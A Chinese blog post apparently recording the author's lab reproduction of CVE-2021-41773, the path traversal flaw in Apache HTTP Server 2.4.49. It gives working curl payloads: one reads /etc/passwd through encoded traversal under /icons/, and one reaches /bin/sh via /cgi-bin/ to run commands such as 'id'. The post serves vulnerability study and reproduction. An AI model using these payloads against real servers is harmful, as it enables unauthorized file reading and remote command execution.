CVE-2021-41773/Apache HTTP Server 路径穿越漏洞

原创

末初mochu7 2023-06-19 21:44:37 博主文章分类：漏洞复现 ©著作权

文章标签 CVE-2021-41773 ico apache github 文章分类 代码人生

©著作权归作者所有：来自51CTO博客作者末初mochu7的原创作品，请联系作者获取转载授权，否则将追究法律责任

自己的一次简单的漏洞复现记录

学习请移步：https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md

https://httpd.apache.org/security/vulnerabilities_24.html

CVE-2021-41773/Apache HTTP Server 路径穿越漏洞_apache

影响版本：=2.4.49
利用条件：穿越的目录允许被访问，比如配置了<Directory />Require all granted</Directory>。（默认情况下是不允许的：<Directory />Require all denied</Directory>）

满足以上两个条件即可造成路径穿越，可以进行任意文件读取
注意：这里的/icons/必须是一个存在且可访问的目录
payload

curl -v --path-as-is http://your-ip:your-port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

CVE-2021-41773/Apache HTTP Server 路径穿越漏洞_ico_02

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

CVE-2021-41773/Apache HTTP Server 路径穿越漏洞_CVE-2021-41773_03

在服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令：

CVE-2021-41773/Apache HTTP Server 路径穿越漏洞_CVE-2021-41773_04

ScriptAlias与Alias指令非常相似，都是定义了映射到一个特定目录的URL前缀，两者一般都用于指定位于DocumentRoot以外的目录，其不同之处是ScriptAlias又多了一层含义，即URL前缀后面的任何文件都被视为CGI程序。所以，上述配置会指示Apache任何以/cgi-bin/开头的资源都将映射到/usr/local/apache2/cgi-bin/目录中，且视之为CGI程序。

payload

curl --data "echo;id" 'http://your-ip:your-port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

CVE-2021-41773/Apache HTTP Server 路径穿越漏洞_CVE-2021-41773_05

/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh

echo;cat /etc/passwd

CVE-2021-41773/Apache HTTP Server 路径穿越漏洞_github_06

上一篇：[纵横网络靶场社区]简单流量分析

下一篇：第二届网刃杯网络安全大赛 Writeup

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯